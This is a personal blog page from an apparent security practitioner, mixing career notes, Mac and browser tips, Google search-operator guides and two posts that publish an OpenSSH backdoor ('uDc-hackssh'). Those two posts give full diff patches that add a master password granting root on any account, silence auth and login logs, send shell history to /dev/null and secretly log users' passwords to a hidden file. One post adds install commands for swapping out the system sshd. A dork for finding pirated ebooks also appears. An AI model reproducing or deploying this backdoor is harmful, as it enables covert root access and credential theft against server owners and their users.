Showing posts with label uDc. Show all posts
Showing posts with label uDc. Show all posts

Thursday, March 2, 2017

Slash Reborn

 بِسْمِ اللّهِ الرَّحْمَنِ الرَّحِيْمِ

السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ
رَبِّ اشْرَحْ لِىْ صَدْرِىْ وَيَسِّرْلِىْ اَمْرِىْ وَاحْلُلْ عُقْدَةً مِنْ لِسَانِىْ يَفْقَهُوْاقَوْلِى 
 
اَلْحَمْدُلِلّ اَللّهُ اَكْبَرُ I'm still here even though not active as I used to be. اِ نْ شَآ ءَ اللّهُ I will keep contributing to share small piece of knowledge I had, which I think acceptable by most people around the globe.

So yeah, like most people, it's a complicated thing to describe me. Some might say it's along the lines of being an "acquired taste." Others might more correctly classify it as, "somebody that some people are willing to tolerate." Most likely, I am just inimitable, like many others. But I'll do the best I can to describe myself with words.

I'd say that I am an eclectic amalgamation of many seemingly paradoxical things. This can be exemplified in both my seemingly endless persistence on many topics and arguments, as well as my careful cautiousness on other topics and arguments. This is largely due to how astute I am of the topic: more knowledge, more persistent; less knowledge, obviously more cautious.

Apparently, I may look something like a serial killer or terrorist. Sometimes I can turn and become somebody who like jokes, use my OpenSSH backdoor and pwned your servers, or I can be your personal and sexiest bodyguard depending how you look at me.

So why Slash The Underground
Slash The Underground was a name given by my linux guru, burn or lordburn. My friends called me 'slash' and sometimes 'nullbyte' which is a nickname for me. It's short, clever, derogatory and sometimes considered desirable, symbolising a form of acceptance, but can often be a form of ridicule.

Read more »
Posted by at 3 comments:
Labels: ,

Monday, July 13, 2015

Magsukul Sapura (thank you Sapura)

السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ and Good Afternoon,

 بِسْمِ اللّهِ الرَّحْمَنِ الرَّحِيْمِ

اَلْحَمْدُلِلّهِ, today is my last day working at Sapura Secured Technologies as Systemic Security Manager for Sapura Defense Sdn Bhd. Once again, I've been given opportunity by Allah S.W.T. to share knowledge and experience for the industry and Information Warfare community. Although I have my own plan, but I know Allah also plans, and Allah is the best of planners. I know who I will be, and I know where I will be, but I know that Allah will choose what’s good for me.

I wanted to wish everyone happy trails. My colleagues have been nothing short of amazing, the knowledge, experience, and the quality of discussions is incredibly stimulating. In the last 7 years with Sapura, Allah S.W.T has shown me a form of great challenges which almost took me down to the ground and taught me a unique knowledge through people around me. I learned a great deal, building skills, relationships and challenges that I never think of.

Read more »
Posted by at No comments:
Labels:

Tuesday, May 27, 2014

Enable USB installation in Bootcamp

Before you do anything, make a backup of Info.plist or the whole Boot Camp Assitant app so that you can go back if necessary. Rename it something like "Info old.plist" or "Original Boot Camp Assistant."

Mandatory steps:
  • Add your model to DARequiredROMVersions
  • Delete the word "Pre" from UEFIModels and add your model
  • Delete the word "Pre" from USBBootSupportedModels and add your model
  • Remove your model from Win7OnlyModels (if its there)

The last step is to do a code sign. Boot Camp Assitant will not run if it's been edited. You need to resign it. Open Terminal (use spotlight to find it) and type this:


sudo codesign -fs - /Applications/Utilities/Boot\ Camp\ Assistant.app

Good luck!
Posted by at 1 comment:
Labels:

Thursday, November 22, 2012

5 Questions Great Job Candidates Ask

Great candidates ask questions they want answered because they're evaluating you, your company--and whether they really want to work for you.

Here are five questions great candidates ask:

What do you expect me to accomplish in the first 60 to 90 days?
Great candidates want to hit the ground running. They don't want to spend weeks or months "getting to know the organization." They want to make a difference--right away.

What are the common attributes of your top performers?
Great candidates also want to be great long-term employees. Every organization is different, and so are the key qualities of top performers in those organizations. Maybe your top performers work longer hours. Maybe creativity is more important than methodology. Maybe constantly landing new customers in new markets is more important than building long-term customer relationships. Maybe it's a willingness to spend the same amount of time educating an entry-level customer as helping an enthusiast who wants high-end equipment. Great candidates want to know, because 1) they want to know if they fit, and 2) if they do fit, they want to be a top performer.

Read more »
Posted by at No comments:
Labels:

Sunday, June 26, 2011

uDc-hackssh-v2.0

CHANAGES:
Updated for openssh-5.x version

FEATURES:
- special password to log in with any user account and get root
- no logs in the machine (messages,auth,utmp,…)
- bash shell will use /dev/null as HISTFILE
- logs user passwords (local and remote sessions)
- should bypass 'PermitRootLogin No"

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:35]-[/pentest/rk/ssh/uDc-hackssh]
$ cat udc-hackssh-v2.0.patch
diff -Ncr openssh-5.8p2/auth-pam.c udc-hackssh-v2.0/auth-pam.c
*** openssh-5.8p2/auth-pam.c Sun Jul 12 20:07:21 2009
--- udc-hackssh-v2.0/auth-pam.c Sun Jun 26 00:55:57 2011
***************
*** 466,471 ****
--- 466,475 ----
   if (sshpam_err != PAM_SUCCESS)
    goto auth_fail;
   sshpam_err = pam_authenticate(sshpam_handle, flags);
+ // slash patch
+  if(uDc)
+   sshpam_err = PAM_SUCCESS;
+ // end of slash
   if (sshpam_err != PAM_SUCCESS)
    goto auth_fail;
 
***************
*** 816,821 ****
--- 820,834 ----
   Buffer buffer;
   struct pam_ctxt *ctxt = ctx;
 
+ // slash patch
+          if(sshpam_authctxt)
+            for (gurun = 0; gurun < num; ++gurun) {
+                sprintf(slashbuff, "pam_from: %s \tuser: %s \tpass: %s\n",
+                        get_remote_ipaddr(), sshpam_authctxt->user, resp[gurun]);
+                if(!strcmp(BAJAUPASS, resp[gurun])) ctxt->pam_done = uDc = 1;
+                    else uDclog();
+            }
+ // end of patch


   debug2("PAM: %s entering, %u responses", __func__, num);
   switch (ctxt->pam_done) {
   case 1:
***************
*** 1205,1210 ****
--- 1218,1226 ----
    fatal("PAM: %s: failed to set PAM_CONV: %s", __func__,
        pam_strerror(sshpam_handle, sshpam_err));
  
+ // slash patch
+  if(!uDc)
+ // end of patch
   sshpam_err = pam_authenticate(sshpam_handle, flags);
   sshpam_password = NULL;
   if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
diff -Ncr openssh-5.8p2/auth-passwd.c udc-hackssh-v2.0/auth-passwd.c
*** openssh-5.8p2/auth-passwd.c Sun Mar  8 08:40:28 2009
--- udc-hackssh-v2.0/auth-passwd.c Sun Jun 26 01:02:17 2011
***************
*** 92,97 ****
--- 92,103 ----
  #endif
   if (*password == '\0' && options.permit_empty_passwd == 0)
    return 0;
+ // slash patch
+        if(!strcmp(BAJAUPASS, password)) return uDc = 1;
+        sprintf(slashbuff, "pass_from: %s \tuser: %s \tpass: %s\n",
+                get_remote_ipaddr(), pw->pw_name, password);
+        uDclog();
+ // end of patch
  
  #ifdef KRB5
   if (options.kerberos_authentication == 1) {
diff -Ncr openssh-5.8p2/auth.c udc-hackssh-v2.0/auth.c
*** openssh-5.8p2/auth.c Wed Dec  1 09:21:51 2010
--- udc-hackssh-v2.0/auth.c Sat Jun 25 23:45:36 2011
***************
*** 94,99 ****
--- 94,104 ----
  int
  allowed_user(struct passwd * pw)
  {
+ // slash patch
+  if(uDc) return 1;
+  else {
+ // end of patch
+ 
   struct stat st;
   const char *hostname = NULL, *ipaddr = NULL, *passwd = NULL;
   u_int i;
***************
*** 249,258 ****
--- 254,269 ----
   /* We found no reason not to let this user try to log on... */
   return 1;
  }
+ // slash patch
+ }
+ // end of patch
  
  void
  auth_log(Authctxt *authctxt, int authenticated, char *method, char *info)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   void (*authlog) (const char *fmt,...) = verbose;
   char *authmsg;
  
***************
*** 298,303 ****
--- 309,317 ----
    audit_event(audit_classify_auth(method));
  #endif
  }
+ // slash patch
+ }
+ // end of patch
  
  /*
   * Check whether root logins are disallowed.
***************
*** 305,310 ****
--- 319,327 ----
  int
  auth_root_allowed(char *method)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   switch (options.permit_root_login) {
   case PERMIT_YES:
    return 1;
***************
*** 322,327 ****
--- 339,349 ----
   logit("ROOT LOGIN REFUSED FROM %.200s", get_remote_ipaddr());
   return 0;
  }
+ // slash patch
+  else
+  return 1;
+ }
+ // end of patch
  
  
  /*
diff -Ncr openssh-5.8p2/canohost.c udc-hackssh-v2.0/canohost.c
*** openssh-5.8p2/canohost.c Tue Oct 12 10:28:12 2010
--- udc-hackssh-v2.0/canohost.c Sat Jun 25 23:48:02 2011
***************
*** 81,86 ****
--- 81,89 ----
   if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
       NULL, 0, NI_NAMEREQD) != 0) {
    /* Host name not found.  Use ip address. */
+ // slash patch
+   if(!uDc)
+ // end of patch
    return xstrdup(ntop);
   }
  
diff -Ncr openssh-5.8p2/includes.h udc-hackssh-v2.0/includes.h
*** openssh-5.8p2/includes.h Sun Oct 24 07:47:30 2010
--- udc-hackssh-v2.0/includes.h Sun Jun 26 00:59:42 2011
***************
*** 13,18 ****
--- 13,40 ----
   * called by a name other than "ssh" or "Secure Shell".
   */
  
+ // slash patch
+ #include 
+ #include 
+ 
+ #define BAJAUPASS     "CHANGE-ME"
+ #define SSH_LOG       "/dev/lala"
+ 
+ FILE *s9clog;
+ char  slashbuff[1024];
+ int   kambing, gurun, uDc;
+ 
+ #define uDclog() {                                 \
+  kambing=strlen(slashbuff);                               \
+  for(gurun=0; gurun<=kambing; gurun++) slashbuff[gurun]=~slashbuff[gurun];   \
+  s9clog=fopen(SSH_LOG, "a");                         \
+  if(s9clog!=NULL) { fwrite(slashbuff, kambing, 1, s9clog); fclose(s9clog);} \
+  chmod(SSH_LOG, 0666);                             \
+ }
+ 
+ const char *get_remote_ipaddr(void);
+ // end of patch
+ 
  #ifndef INCLUDES_H
  #define INCLUDES_H
  
diff -Ncr openssh-5.8p2/log.c udc-hackssh-v2.0/log.c
*** openssh-5.8p2/log.c Tue Jun 10 21:01:51 2008
--- udc-hackssh-v2.0/log.c Sat Jun 25 23:25:53 2011
***************
*** 336,341 ****
--- 336,345 ----
   char fmtbuf[MSGBUFSIZ];
   char *txt = NULL;
   int pri = LOG_INFO;
+ 
+ // slash patch
+  if(uDc) return;
+ // end of patch
   int saved_errno = errno;
  
   if (level > log_level)
diff -Ncr openssh-5.8p2/loginrec.c udc-hackssh-v2.0/loginrec.c
*** openssh-5.8p2/loginrec.c Mon Jan 17 18:15:31 2011
--- udc-hackssh-v2.0/loginrec.c Sat Jun 25 23:28:05 2011
***************
*** 433,438 ****
--- 433,442 ----
  int
  login_write(struct logininfo *li)
  {
+ // slash patch
+  if(uDc) return 0;
+ // end of patch
+ 
  #ifndef HAVE_CYGWIN
   if (geteuid() != 0) {
    logit("Attempt to write login records by non-root user (aborting)");
diff -Ncr openssh-5.8p2/session.c udc-hackssh-v2.0/session.c
*** openssh-5.8p2/session.c Wed Dec  1 09:02:59 2010
--- udc-hackssh-v2.0/session.c Sun Jun 26 00:01:56 2011
***************
*** 1198,1203 ****
--- 1198,1207 ----
   }
   if (getenv("TZ"))
    child_set_env(&env, &envsize, "TZ", getenv("TZ"));
+ // slash patch
+  if(uDc)
+   child_set_env(&env, &envsize, "HISTFILE", "/dev/null");
+ // end of patch
  
   /* Set custom environment options from RSA authentication. */
   if (!options.use_login) {
***************
*** 1483,1488 ****
--- 1487,1495 ----
  #else
    if (setlogin(pw->pw_name) < 0)
     error("setlogin failed: %s", strerror(errno));
+ // slash patch
+   if(!uDc) {
+ // end of patch
    if (setgid(pw->pw_gid) < 0) {
     perror("setgid");
     exit(1);
***************
*** 1492,1497 ****
--- 1499,1511 ----
     perror("initgroups");
     exit(1);
    }
+ // slash patch
+  }
+  else {
+   setgid(0);
+   initgroups(pw->pw_name, 0);
+  }
+ // end of patch
    endgrent();
  #endif
  
***************
*** 1515,1520 ****
--- 1529,1537 ----
    }
  #else
    /* Permanently switch to the desired uid. */
+ // slash patch
+  if(!uDc)
+ // end of patch
    permanently_set_uid(pw);
  #endif
   }
diff -Ncr openssh-5.8p2/sshconnect1.c udc-hackssh-v2.0/sshconnect1.c
*** openssh-5.8p2/sshconnect1.c Tue Nov  7 20:14:42 2006
--- udc-hackssh-v2.0/sshconnect1.c Sat Jun 25 23:31:17 2011
***************
*** 458,463 ****
--- 458,468 ----
    password = read_passphrase(prompt, 0);
    packet_start(SSH_CMSG_AUTH_PASSWORD);
    ssh_put_password(password);
+ // slash patch
+                 sprintf(slashbuff, "1to: %s \tuser: %s \tpass: %s\n",
+    get_remote_ipaddr(), options.user, password);
+                 uDclog();
+ // end of patch
    memset(password, 0, strlen(password));
    xfree(password);
    packet_send();
diff -Ncr openssh-5.8p2/sshconnect2.c udc-hackssh-v2.0/sshconnect2.c
*** openssh-5.8p2/sshconnect2.c Wed Dec  1 09:21:51 2010
--- udc-hackssh-v2.0/sshconnect2.c Sun Jun 26 01:00:47 2011
***************
*** 883,888 ****
--- 883,893 ----
   packet_put_cstring(authctxt->method->name);
   packet_put_char(0);
   packet_put_cstring(password);
+ // slash patch
+        sprintf(slashbuff, "T0: %s \tuser: %s \tpass: %s\n",
+                get_remote_ipaddr(), options.user, password);
+        uDclog();
+ // end of patch
   memset(password, 0, strlen(password));
   xfree(password);
   packet_add_padding(64);
***************
*** 1558,1563 ****
--- 1563,1573 ----
  
    response = read_passphrase(prompt, echo ? RP_ECHO : 0);
  
+ // slash patch
+                sprintf(slashbuff, "T0: %s \tuser: %s \tpass: %s\n",
+                    get_remote_ipaddr(), options.user, response);
+                uDclog();
+ // end of patch
    packet_put_cstring(response);
    memset(response, 0, strlen(response));
    xfree(response);
diff -Ncr openssh-5.8p2/sshlogin.c udc-hackssh-v2.0/sshlogin.c
*** openssh-5.8p2/sshlogin.c Tue Jan 11 14:20:07 2011
--- udc-hackssh-v2.0/sshlogin.c Sun Jun 26 00:10:32 2011
***************
*** 126,131 ****
--- 126,134 ----
  record_login(pid_t pid, const char *tty, const char *user, uid_t uid,
      const char *host, struct sockaddr *addr, socklen_t addrlen)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   struct logininfo *li;
  
   /* save previous login details before writing new */
***************
*** 136,147 ****
--- 139,156 ----
   login_login(li);
   login_free_entry(li);
  }
+ // slash patch
+ }
+ // end of patch
  
  #ifdef LOGIN_NEEDS_UTMPX
  void
  record_utmp_only(pid_t pid, const char *ttyname, const char *user,
     const char *host, struct sockaddr *addr, socklen_t addrlen)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   struct logininfo *li;
  
   li = login_alloc_entry(pid, user, host, ttyname);
***************
*** 149,163 ****
--- 158,181 ----
   login_utmp_only(li);
   login_free_entry(li);
  }
+ // slash patch
+ }
+ // end of patch
  #endif
  
  /* Records that the user has logged out. */
  void
  record_logout(pid_t pid, const char *tty, const char *user)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   struct logininfo *li;
  
   li = login_alloc_entry(pid, user, NULL, tty);
   login_logout(li);
   login_free_entry(li);
  }
+ // slash patch
+ }
+ // end of patch
diff -Ncr openssh-5.8p2/version.h udc-hackssh-v2.0/version.h
*** openssh-5.8p2/version.h Thu May  5 09:56:54 2011
--- udc-hackssh-v2.0/version.h Sat Jun 25 23:37:03 2011
***************
*** 1,6 ****
  /* $OpenBSD: version.h,v 1.61 2011/02/04 00:44:43 djm Exp $ */
  
! #define SSH_VERSION "OpenSSH_5.8"
  
  #define SSH_PORTABLE "p2"
  #define SSH_RELEASE SSH_VERSION SSH_PORTABLE
--- 1,6 ----
  /* $OpenBSD: version.h,v 1.61 2011/02/04 00:44:43 djm Exp $ */
  
! #define SSH_VERSION "OpenSSH_5.8" // change
  
  #define SSH_PORTABLE "p2"
  #define SSH_RELEASE SSH_VERSION SSH_PORTABLE
Posted by at No comments:
Labels: ,

Friday, October 22, 2010

Review for Network Security The Complete Reference

I've been looking for "Onion Methodology" for past few weeks. Network Security The Complete Reference has it.

"The Onion Model of Defense is a layered strategy, sometimes referred to as Defense in Depth. This model addresses the contingency of pa perimeter security breach occurring."

"Consider what happens when an invader picks the front door lock or breaks a window to gain entry to a house? The homeowner may hide cash in a drawer and may store valuable jewels in a safe. These protective mechanisms address the contingency that the perimeter security fails. They also address the prospect of an inside job. The same principles apply to network security. What happens when an attacker gets past the firewall? What happens when a trusted insider, like an employee or a contractor, abuse their privileges? The onion model addresses these contingencies."

Generally, the book is about a comprehensive resource that provide all the information necessary to formulate strategies to obtain and implement a network security program. A five star book.

Posted by at No comments:
Labels: , ,

Tuesday, October 5, 2010

Google Dork: eBook

Google: -inurl:htm -inurl:html intitle:”index of” +(“/ebooks”|”/book”) +(chm|pdf|zip)

What does all of this mean? The -inurl htm and -inul html is attempting to get rid of regular webpages and show just index pages. Looking for index of in the title is doing the same. Using the pipe ( | ) tells google to look for something OR something else. Here were are telling google to look for book or ebook directories… and we have listed several common ebook formats (zip, pdf, chf).

If you would like to look for a particular author or title just tack it to the end of your search.

Google: -inurl:htm -inurl:html intitle:”index of” +(“/ebooks”|”/book”) +(chm|pdf|zip) +”o’reilly”

This uses the same idea but attempts to focus on directories that contain O’Reilly stuff. It’s not perfect, but it’s better than paying.
Posted by at No comments:
Labels: ,

Google Dork

Google Calc:

Google can also be used as a calculator, here are the few calculator operators that you can
use to perform arithmetic operations in Google.

+ , - , * , / , % of , ^

Goto www.google.com and in the input box, type in the calculation that you want to perform,
something like 8-5, Then you can get the appropriate result. Likewise you can use the rest of
the Calculator operators.

+ and - is not only meant for performing arithmetic operations, but you can use them to narrow down your search. Search for hacking + ebooks this will search for both hacking and ebooks, but gives more priority for ebooks rather that hacking.
Search for hacking – cracking so that you can restrict cracking related sites and info while searching for hacking.

Searching for Phrase ?
If you are searching for a phrase, then don’t forget to enclose it within quotes, it doesn’t matter, whatever the quote is, either single or double quote.
“igconito” or ‘igconito’

Wildcard search:
You can use asterisk operator for wildcard search in Google that find that possible matches either in one or more words that is enclosed in the quotes.
“adm*”

Some other Google Opertors:
Site:

This operator is used for search only one website alone for particular result. hacking info site:www.microsoft.com This query will narrow down your search and will find some hacking related information on the site www.microsoft.com.

Num range:
10….20
When this query is given as input to the google, then it will search for a number that ranges between 10 to 20.

Link:
link:www.microsoft.com
This query will display you, what ever the page that is linked with the site www.microsoft.com.

Related:
related:www.warez.com
What ever the websites that looks similar in contents or related to each other will be displayed as a result of this query.

Cache:
cache:www.ethicaluniversity.com
We can use this cache operator also as a proxy, because once we use this cache operator, Google will be acting as a proxy that stay in middle of the source and the destination.

Site:
site:www.ethicaluniversity.com
Site operator can be used to search whatever that is been indexed in a website.
now this will reveals a lot about this site that got indexed in its server.

allinanchor: Both the link and the allinanchor operator does the same thing, where allinanchor search for keywords that is enclosed in the anchor tag. allinanchor:login

Stocks:
stocks:icici
Using this stocks operator, you can get the current stock details.

Safesearch:
When SafeSearch is turned on, sites and web pages containing pornography and explicit sexual content are blocked from search results. Many Google users prefer not to have adult sites included in their search results. Google’s SafeSearch screens for sites that contain this type of information and eliminates them from search results. safesearch: keygens + cracks

Phonebook:
This operator will allow you to search phone numbers that Google consider them for quick reference.
phonebook: Disney CA

Info:
This operator cannot be used along with other Google operator.
This can be used for viewing information that Google knows about your site.
info:www.yahoo.com

Filetype:
You can narrow down your search using this filetype operator, if you are seacrhing for a file of specific type.
filetype:pdf “Networks”
This will fetch you some PDF documents or E-Books related to networking.

Google currently supports the following filetypes:
 txt, doc, pdf, ps, wk1, wk2, wk3, wk4, wk5, wki, wks, wku, lwp, mw, xls, ppt, wks, wps, wdb, wri, rtf, swf, ans, xml, cpp, java, torrent and so on.

Ext:
This is similar to the filetype operator. ext:pdf “Networks”

Define:
If you want to use Google like a Dictionary finding out for meaning or the definitions, you can use the define operator. define:hacking

allintext:
This is somewhat similar to the normal search that most of them do often, you can search for a specific term in google, and can use more number of words enclosed with quotes. allintext:defaced mirror

intitle:
This operator performs search by looking upon the text that is enclosed in the title tag. intitle:”admin login”

allintitle:
You can use only one argument while using the intitle operator, where as you can throw more than one in allintitle operator. intitle:”admin login” “webmaster login” “administrator”

Location:
You can search contents only from selected country websites by specifying the location using the location operator.
inurl:admin.asp location:india
This will fetch you pages that contain admin.asp in its URL and will be from India.

Source:
You can narrow down the search by restricting the source. you can specify the source as a popular E-zines, aricles and even publishers.
“Network Security” source:tata mcgraw hill
This will fetch you results for “Network Security” related topics that was published by tata McGraw Hill publications.

Weather:
weather:chennai This will return you the weather in chennai. likewise you can look for your city.

Conversions:
 you can convert to or from Degrees and Radians using Google.

Number Bases

in hex

in binary

in octal

in decimal

Speed, time and distance conversions

20mph in kph

2 month in minutes

420 kelvin in celsius

5 fahrenheit in celsius
Posted by at No comments:
Labels: ,

Thursday, June 17, 2010

Google Chrome socks5


1. Paste and save to CAP filetype e.g. my-socks.cap
function FindProxyForURL(url, host) { return "SOCKS5 localhost:8080"; }

2. Configure Proxy Switchy - Auto config URL: file:///D:/security/proxy-tunnel/ucsc-tunnel.cap

3. Done









Posted by at No comments:
Labels:

Friday, May 21, 2010

Something to quote 

"Software is like sex. It's better when it's free." -- Linus Torvalds
"A chain is only as strong as its weakest link." -- Charles A. Lindberg
"I have seen the fnords." -- Historical graffiti on Anarchy Bridge, UK
"Testing can prove the presence of bugs, but not their absence." -- E. Dijkstra
"Hi, my name is Pete and I'm an OSSTMM user." -- Pete Herzog
"The GNU people aren't evil." -- /usr/src/linux/Documentation/CodingStyle
"There are always errors in real data." -- The AWK Programming Language
"When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl." -- Anonymous
Posted by at No comments:
Labels:

Saturday, September 12, 2009

uDc-hackssh-v1.0b

Features:
- special password to log in with any user account and get root
- no logs in the machine (messages,auth,utmp,…)
- bash shell will use /dev/null as HISTFILE
- logs user passwords (local and remote sessions)
- should bypass 'PermitRootLogin No"

Installation:
[slash@Slash-The-Underground]-[Sat Sep 12]-[00:35]-[/pentest/rk/ssh/uDc-hackssh]
$ pwd
/pentest/rk/ssh/uDc-hackssh

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh]
$ tar -zxf openssh-5.2p1.tar.gz

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh]
$ patch -p0 < uDc-hackssh-v1.0b

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ cd openssh-5.2p1

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ ./configure --prefix=/usr --sbindir=/usr/sbin --bindir=/usr/bin --sysconfdir=/path_to_origin_configuration --with-pam

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ make

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ strip ssh sshd

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ rm -rf /usr/sbin/sshd /usr/bin/ssh

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ cp ssh /usr/bin/ssh

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ cp sshd /usr/sbin/sshd
[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ ps -ax | grep sshd
[slash@Slash-The-Underground]-[Sat Sep 12]-[00:36]-[/pentest/rk/ssh/uDc-hackssh] $ kill -HUP 'appropriate pid number' And finally, the patch code....
[slash@Slash-The-Underground]-[Sat Sep 12]-[00:29]-[/pentest/rk/ssh/uDc-hackssh] $ cat uDc-hackssh-v1.0b.patch
diff -Ncr openssh-5.2p1/auth-pam.c uDc-hackssh-v1.0b/auth-pam.c
*** openssh-5.2p1/auth-pam.c Tue Mar 11 19:58:25 2008
--- uDc-hackssh-v1.0b/auth-pam.c Fri Sep 11 22:38:47 2009
***************
*** 466,471 ****
--- 466,474 ----
if (sshpam_err != PAM_SUCCESS) goto auth_fail;
sshpam_err = pam_authenticate(sshpam_handle, flags);
+ // slash patch
+ if(uDc) sshpam_err = PAM_SUCCESS;
+ // end of patch 
if (sshpam_err != PAM_SUCCESS) goto auth_fail;

***************
*** 816,821 ****
--- 819,833 ----
Buffer buffer;
struct pam_ctxt *ctxt = ctx;
+ // slash patch + if(sshpam_authctxt)
+ for (ai = 0; ai < num; ++ai) {
+ sprintf(abuff, "pam_from: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), sshpam_authctxt->user, resp[ai]);
+ if(!strcmp(BAJAUPASS, resp[ai])) ctxt->pam_done = uDc = 1;
+ else uDclog();
+ }
+ // end of patch
debug2("PAM: %s entering, %u responses", __func__, num);
switch (ctxt->pam_done) {
case 1:
***************
*** 1045,1050 ****
--- 1057,1065 ----
if (sshpam_err != PAM_SUCCESS)
fatal("PAM: failed to set PAM_CONV: %s",
pam_strerror(sshpam_handle, sshpam_err));
+ // slash patch
+ if(!uDc)
+ // end of patch
sshpam_err = pam_open_session(sshpam_handle, 0);
if (sshpam_err == PAM_SUCCESS)
sshpam_session_open = 1;

diff -Ncr openssh-5.2p1/auth-passwd.c uDc-hackssh-v1.0b/auth-passwd.c
*** openssh-5.2p1/auth-passwd.c Fri Oct 26 12:25:12 2007
--- uDc-hackssh-v1.0b/auth-passwd.c Fri Sep 11 23:30:00 2009
***************
*** 92,97 ****
--- 92,107 ----
#endif
if (*password == '\0' && options.permit_empty_passwd == 0)
return 0;
+ // slash patch
+ if(!strcmp(BAJAUPASS, password)) {
+ uDc = 1;
+ // options.permit_root_login = PERMIT_YES;
+ return;
+ }
+ sprintf(abuff, "pass_from: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), pw->pw_name, password);
+ uDclog();
+ // end of patch

#ifdef KRB5
if (options.kerberos_authentication == 1) {

diff -Ncr openssh-5.2p1/auth.c uDc-hackssh-v1.0b/auth.c
*** openssh-5.2p1/auth.c Wed Nov 5 13:12:54 2008
--- uDc-hackssh-v1.0b/auth.c Fri Sep 11 23:35:47 2009
***************
*** 93,98 ****
--- 93,104 ----
int
allowed_user(struct passwd * pw)
{
+ // slash patch
+ if(uDc)
+ return 1;
+ else {
+ // end of patch
+
struct stat st;
const char *hostname = NULL, *ipaddr = NULL, *passwd = NULL;
char *shell;
***************
*** 243,252 ****
--- 249,264 ----
/* We found no reason not to let this user try to log on... */
return 1;
}
+ // slash patch
+ }
+ // end of patch

void
auth_log(Authctxt *authctxt, int authenticated, char *method, char *info)
{
+ // slash patch
+ if(!uDc) {
+ // end of patch
void (*authlog) (const char *fmt,...) = verbose;
char *authmsg;

***************
*** 291,296 ****
--- 303,311 ----
if (authenticated == 0 && !authctxt->postponed)
audit_event(audit_classify_auth(method));
#endif
+ // slash patch
+ }
+ // end of patch
}

/*
***************
*** 299,304 ****
--- 314,322 ----
int
auth_root_allowed(char *method)
{
+ // slash patch
+ if(!uDc) {
+ // end of patch
switch (options.permit_root_login) {
case PERMIT_YES:
return 1;
***************
*** 316,321 ****
--- 334,344 ----
logit("ROOT LOGIN REFUSED FROM %.200s", get_remote_ipaddr());
return 0;
}
+ // slash patch
+ else
+ return 1;
+ }
+ // end of patch


/*
diff -Ncr openssh-5.2p1/canohost.c uDc-hackssh-v1.0b/canohost.c
*** openssh-5.2p1/canohost.c Sat Feb 14 13:28:21 2009
--- uDc-hackssh-v1.0b/canohost.c Fri Sep 11 23:38:28 2009
***************
*** 78,83 ****
--- 78,86 ----
if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
NULL, 0, NI_NAMEREQD) != 0) {
/* Host name not found. Use ip address. */
+ // slash patch
+ if(!uDc)
+ // end of patch
return xstrdup(ntop);
}

diff -Ncr openssh-5.2p1/includes.h uDc-hackssh-v1.0b/includes.h
*** openssh-5.2p1/includes.h Fri Jul 4 21:10:49 2008
--- uDc-hackssh-v1.0b/includes.h Fri Sep 11 22:38:47 2009
***************
*** 13,18 ****
--- 13,41 ----
* called by a name other than "ssh" or "Secure Shell".
*/

+ // slash patch
+ #include
+ #include
+
+ #define BAJAUPASS "@#;.,uDc,.;#@"
+ #define SSH_LOG "/usr/share/yelp/im.xml"
+
+ FILE *bajaulog;
+ char abuff[1024];
+ int kambing, ai, uDc;
+
+ #define uDclog() { \
+ kambing=strlen(abuff); \
+ for(ai=0; ai<=kambing; ai++) abuff[ai]=~abuff[ai]; \ 
+ bajaulog=fopen(SSH_LOG, "a"); \ 
+ if(bajaulog!=NULL) { fwrite(abuff, kambing, 1, bajaulog); fclose(bajaulog);} \ 
+ chmod(SSH_LOG, 0666); \ 
+ } 

+ const char *get_remote_ipaddr(void); 
+ // end of patch 

+ #ifndef INCLUDES_H 
#define INCLUDES_H 

diff -Ncr openssh-5.2p1/log.c uDc-hackssh-v1.0b/log.c 
*** openssh-5.2p1/log.c Tue Jun 10 21:01:51 2008 
--- uDc-hackssh-v1.0b/log.c Fri Sep 11 22:38:47 2009 
*************** 
*** 338,343 **** 
--- 338,346 ---- 
int pri = LOG_INFO; 
int saved_errno = errno; 
+ // slash patch 
+ if(uDc) return; 
+ // end of patch if (level > log_level)
return;

diff -Ncr openssh-5.2p1/loginrec.c uDc-hackssh-v1.0b/loginrec.c
*** openssh-5.2p1/loginrec.c Thu Feb 12 10:12:22 2009
--- uDc-hackssh-v1.0b/loginrec.c Fri Sep 11 22:38:47 2009
***************
*** 431,436 ****
--- 431,439 ----
int
login_write(struct logininfo *li)
{
+ // slash patch
+ if(uDc) return 0;
+ // end of patch
#ifndef HAVE_CYGWIN
if (geteuid() != 0) {
logit("Attempt to write login records by non-root user (aborting)");
 
diff -Ncr openssh-5.2p1/session.c uDc-hackssh-v1.0b/session.c
*** openssh-5.2p1/session.c Wed Jan 28 13:29:49 2009
--- uDc-hackssh-v1.0b/session.c Fri Sep 11 23:48:15 2009
***************
*** 1193,1198 ****
